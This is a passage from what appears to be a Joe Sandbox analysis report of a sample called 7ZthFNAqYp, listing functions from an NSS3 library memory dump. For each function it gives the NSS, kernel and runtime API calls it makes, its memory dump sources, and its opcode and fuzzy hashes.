                                                                                                                                                                                                              • Opcode ID: 3733e63c0e327fc58fde2665a7d10378647d86ab00912d5f472b44007692ed43
                                                                                                                                                                                                              • Instruction ID: cd7b2fdf3937a7316bc4126c0f613bd016e8187bba32d92e007b36d36fde21e6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3733e63c0e327fc58fde2665a7d10378647d86ab00912d5f472b44007692ed43
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6EF044325012207FE7111BA59C4DD9B7E7CEF4A6A5B014055FA19E7161DEB09D8087A4
                                                                                                                                                                                                              Function 6CB0CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,00000100,?), ref: 6CB0CD08
                                                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,?), ref: 6CB0CE16
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CB0D079
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1351604052-0
                                                                                                                                                                                                              • Opcode ID: a2aa6706f052827a6b52a10b1e2b09f480f356e760c8626ddb537554f69557e9
                                                                                                                                                                                                              • Instruction ID: 27bf0438ff7c76982f4dc94a6bb26f3e943824b5a350152ea4f178b940b231fa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2aa6706f052827a6b52a10b1e2b09f480f356e760c8626ddb537554f69557e9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4FC170B1A002599BDB10CF24DC80BDABBB8FB48318F1441A8E94C97741E775EE95CF92
                                                                                                                                                                                                              Function 6CAFDC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6CB097C1,?,00000000,00000000,?,?,?,00000000,?,6CAE7F4A,00000000), ref: 6CAFDC68
                                                                                                                                                                                                                • Part of subcall function 6CB20BE0: malloc.MOZGLUE(6CB18D2D,?,00000000,?), ref: 6CB20BF8
                                                                                                                                                                                                                • Part of subcall function 6CB20BE0: TlsGetValue.KERNEL32(6CB18D2D,?,00000000,?), ref: 6CB20C15
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6CAE7F4A,00000000,?,00000000,00000000), ref: 6CAFDD36
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CAE7F4A,00000000,?,00000000,00000000), ref: 6CAFDE2D
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6CAE7F4A,00000000,?,00000000,00000000), ref: 6CAFDE43
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6CAE7F4A,00000000,?,00000000,00000000), ref: 6CAFDE76
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CAE7F4A,00000000,?,00000000,00000000), ref: 6CAFDF32
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6CAE7F4A,00000000,?,00000000,00000000), ref: 6CAFDF5F
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6CAE7F4A,00000000,?,00000000,00000000), ref: 6CAFDF78
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6CAE7F4A,00000000,?,00000000,00000000), ref: 6CAFDFAA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Alloc_Util$memcpy$Valuemalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1886645929-0
                                                                                                                                                                                                              • Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                                                              • Instruction ID: bb7a09c7a2ae7fa9446896298397609b3fb17c42ae25c1a6c37a1a928f27a6a3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA81B071E066018BFB134E19D89036976B2DB60349F28883AF979CBFE5D778C4C6C612
                                                                                                                                                                                                              Function 6CAD3C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PK11_GetCertFromPrivateKey.NSS3(?), ref: 6CAD3C76
                                                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(00000000), ref: 6CAD3C94
                                                                                                                                                                                                                • Part of subcall function 6CAC95B0: TlsGetValue.KERNEL32(00000000,?,6CAE00D2,00000000), ref: 6CAC95D2
                                                                                                                                                                                                                • Part of subcall function 6CAC95B0: EnterCriticalSection.KERNEL32(?,?,?,6CAE00D2,00000000), ref: 6CAC95E7
                                                                                                                                                                                                                • Part of subcall function 6CAC95B0: PR_Unlock.NSS3(?,?,?,?,6CAE00D2,00000000), ref: 6CAC9605
                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6CAD3CB2
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6CAD3CCA
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6CAD3CE1
                                                                                                                                                                                                                • Part of subcall function 6CAD3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAEAE42), ref: 6CAD30AA
                                                                                                                                                                                                                • Part of subcall function 6CAD3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CAD30C7
                                                                                                                                                                                                                • Part of subcall function 6CAD3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CAD30E5
                                                                                                                                                                                                                • Part of subcall function 6CAD3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAD3116
                                                                                                                                                                                                                • Part of subcall function 6CAD3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CAD312B
                                                                                                                                                                                                                • Part of subcall function 6CAD3090: PK11_DestroyObject.NSS3(?,?), ref: 6CAD3154
                                                                                                                                                                                                                • Part of subcall function 6CAD3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD317E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3167935723-0
                                                                                                                                                                                                              • Opcode ID: 3629e80f11d1c25c09a7b031888952bd4cecd748bbfa03f533c97725ba6dde81
                                                                                                                                                                                                              • Instruction ID: 50d3d4c71b1f64e38c239d1d259d4b8362978ce7c88603151340589b56cfc0ce
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3629e80f11d1c25c09a7b031888952bd4cecd748bbfa03f533c97725ba6dde81
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A61E8B1A01201BBEB105F65DC45FAB7AB9EF0474CF0D4028FD499AA92F731E958C7A1
                                                                                                                                                                                                              Function 6CB13D40 Relevance: 13.7, APIs: 9, Instructions: 169COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CB13440: PK11_GetAllTokens.NSS3 ref: 6CB13481
                                                                                                                                                                                                                • Part of subcall function 6CB13440: PR_SetError.NSS3(00000000,00000000), ref: 6CB134A3
                                                                                                                                                                                                                • Part of subcall function 6CB13440: TlsGetValue.KERNEL32 ref: 6CB1352E
                                                                                                                                                                                                                • Part of subcall function 6CB13440: EnterCriticalSection.KERNEL32(?), ref: 6CB13542
                                                                                                                                                                                                                • Part of subcall function 6CB13440: PR_Unlock.NSS3(?), ref: 6CB1355B
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB13D8B
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CB13D9F
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB13DCA
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CB13DE2
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CB13E4F
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB13E97
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CB13EAB
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB13ED6
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CB13EEE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2554137219-0
                                                                                                                                                                                                              • Opcode ID: 90da4532d24183bf153350d8a2539b707abb735c543b747a8f9c096e484f9ab8
                                                                                                                                                                                                              • Instruction ID: 7b111def05654ffdb5ae6631ddb7aa367558308e0de2d99c3abecaa38c6e9476
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90da4532d24183bf153350d8a2539b707abb735c543b747a8f9c096e484f9ab8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C512676A047819FDB01AF29DC44B6A77B4EF45318F150168DE0957E11FB31E984CBE2
                                                                                                                                                                                                              Function 6CAC2C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(6E1D4487), ref: 6CAC2C5D
                                                                                                                                                                                                                • Part of subcall function 6CB20D30: calloc.MOZGLUE ref: 6CB20D50
                                                                                                                                                                                                                • Part of subcall function 6CB20D30: TlsGetValue.KERNEL32 ref: 6CB20D6D
                                                                                                                                                                                                              • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CAC2C8D
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAC2CE0
                                                                                                                                                                                                                • Part of subcall function 6CAC2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CAC2CDA,?,00000000), ref: 6CAC2E1E
                                                                                                                                                                                                                • Part of subcall function 6CAC2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CAC2E33
                                                                                                                                                                                                                • Part of subcall function 6CAC2E00: TlsGetValue.KERNEL32 ref: 6CAC2E4E
                                                                                                                                                                                                                • Part of subcall function 6CAC2E00: EnterCriticalSection.KERNEL32(?), ref: 6CAC2E5E
                                                                                                                                                                                                                • Part of subcall function 6CAC2E00: PL_HashTableLookup.NSS3(?), ref: 6CAC2E71
                                                                                                                                                                                                                • Part of subcall function 6CAC2E00: PL_HashTableRemove.NSS3(?), ref: 6CAC2E84
                                                                                                                                                                                                                • Part of subcall function 6CAC2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CAC2E96
                                                                                                                                                                                                                • Part of subcall function 6CAC2E00: PR_Unlock.NSS3 ref: 6CAC2EA9
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAC2D23
                                                                                                                                                                                                              • CERT_IsCACert.NSS3(00000001,00000000), ref: 6CAC2D30
                                                                                                                                                                                                              • CERT_MakeCANickname.NSS3(00000001), ref: 6CAC2D3F
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAC2D73
                                                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6CAC2DB8
                                                                                                                                                                                                              • free.MOZGLUE ref: 6CAC2DC8
                                                                                                                                                                                                                • Part of subcall function 6CAC3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAC3EC2
                                                                                                                                                                                                                • Part of subcall function 6CAC3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CAC3ED6
                                                                                                                                                                                                                • Part of subcall function 6CAC3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CAC3EEE
                                                                                                                                                                                                                • Part of subcall function 6CAC3E60: PR_CallOnce.NSS3(6CC22AA4,6CB212D0), ref: 6CAC3F02
                                                                                                                                                                                                                • Part of subcall function 6CAC3E60: PL_FreeArenaPool.NSS3 ref: 6CAC3F14
                                                                                                                                                                                                                • Part of subcall function 6CAC3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAC3F27
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3941837925-0
                                                                                                                                                                                                              • Opcode ID: bfc32f1dc024c5d063397bf0cebc1a6b597489e610e04e1f8549f891b1e189b5
                                                                                                                                                                                                              • Instruction ID: 498d56fe4ff137e93b68ffa1b7435d009989816377c0c722f28a14ffeee408e1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfc32f1dc024c5d063397bf0cebc1a6b597489e610e04e1f8549f891b1e189b5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F751D171B043119BEB02DE29DC89B5B77E5EF94348F180638EC5997610EB31E898CB93
                                                                                                                                                                                                              Function 6CAC7CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CAC40D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6CAC3F7F,?,00000055,?,?,6CAC1666,?,?), ref: 6CAC40D9
                                                                                                                                                                                                                • Part of subcall function 6CAC40D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6CAC1666,?,?), ref: 6CAC40FC
                                                                                                                                                                                                                • Part of subcall function 6CAC40D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6CAC1666,?,?), ref: 6CAC4138
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CAC7CFD
                                                                                                                                                                                                                • Part of subcall function 6CB89BF0: TlsGetValue.KERNEL32(?,?,?,6CBD0A75), ref: 6CB89C07
                                                                                                                                                                                                              • SECITEM_ItemsAreEqual_Util.NSS3(?,6CBE9030), ref: 6CAC7D1B
                                                                                                                                                                                                                • Part of subcall function 6CB1FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6CAC1A3E,00000048,00000054), ref: 6CB1FD56
                                                                                                                                                                                                              • SECITEM_ItemsAreEqual_Util.NSS3(?,6CBE9048), ref: 6CAC7D2F
                                                                                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6CAC7D50
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CAC7D61
                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(?), ref: 6CAC7D7D
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CAC7D9C
                                                                                                                                                                                                              • CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6CAC7DB8
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE023,00000000), ref: 6CAC7E19
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 70581797-0
                                                                                                                                                                                                              • Opcode ID: 28fcaf348fda532fd345ae7a2e69b17fbbcc08c6cf88d01902276bf71586f408
                                                                                                                                                                                                              • Instruction ID: d6e06af1d0caae02701895b155477fe71d312051cb85f705de3cda1e77327415
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 28fcaf348fda532fd345ae7a2e69b17fbbcc08c6cf88d01902276bf71586f408
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D41C672B0015A9BDB018E699C41BBF37E8AF5435CF090164EC19E7B51E730ED99CBA2
                                                                                                                                                                                                              Function 6CAD7EB0 Relevance: 13.6, APIs: 9, Instructions: 124threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • free.MOZGLUE(?,00000000,00000000,?,?,?,6CAD80DD), ref: 6CAD7F15
                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,6CAD80DD), ref: 6CAD7F36
                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,6CAD80DD), ref: 6CAD7F3D
                                                                                                                                                                                                              • SECOID_Shutdown.NSS3(00000000,00000000,?,?,?,6CAD80DD), ref: 6CAD7F5D
                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,6CAD80DD), ref: 6CAD7F94
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CAD7F9B
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE08B,00000000,6CAD80DD), ref: 6CAD7FD0
                                                                                                                                                                                                              • PR_SetThreadPrivate.NSS3(FFFFFFFF,00000000,6CAD80DD), ref: 6CAD7FE6
                                                                                                                                                                                                              • free.MOZGLUE(?,6CAD80DD), ref: 6CAD802D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$CriticalDeleteSection$ErrorPrivateShutdownThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4037168058-0
                                                                                                                                                                                                              • Opcode ID: 457afbcc81a9cb5cf3af7887e6dc65d65d885c18b5355c3de494504b2cfc58db
                                                                                                                                                                                                              • Instruction ID: e170a01b2230b6a04bedb89be416c82097c39528bd5cce4c5311e15bd420b18a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 457afbcc81a9cb5cf3af7887e6dc65d65d885c18b5355c3de494504b2cfc58db
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29411971B211404BDB14DFB9C89DE4A77B9BB47368F150229E919C3B40D734E889CB91
                                                                                                                                                                                                              Function 6CB1FEE0 Relevance: 13.6, APIs: 9, Instructions: 120memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB1FF00
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(?), ref: 6CB1FF18
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CB1FF26
                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(?), ref: 6CB1FF4F
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CB1FF7A
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CB1FF8C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ArenaUtil$Alloc_Mark_$ErrorValuememset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1233137751-0
                                                                                                                                                                                                              • Opcode ID: dcfbf9040530a7f09a711ea8c17f0e2259a23e3df23c09d6e8e0700c9f4818b5
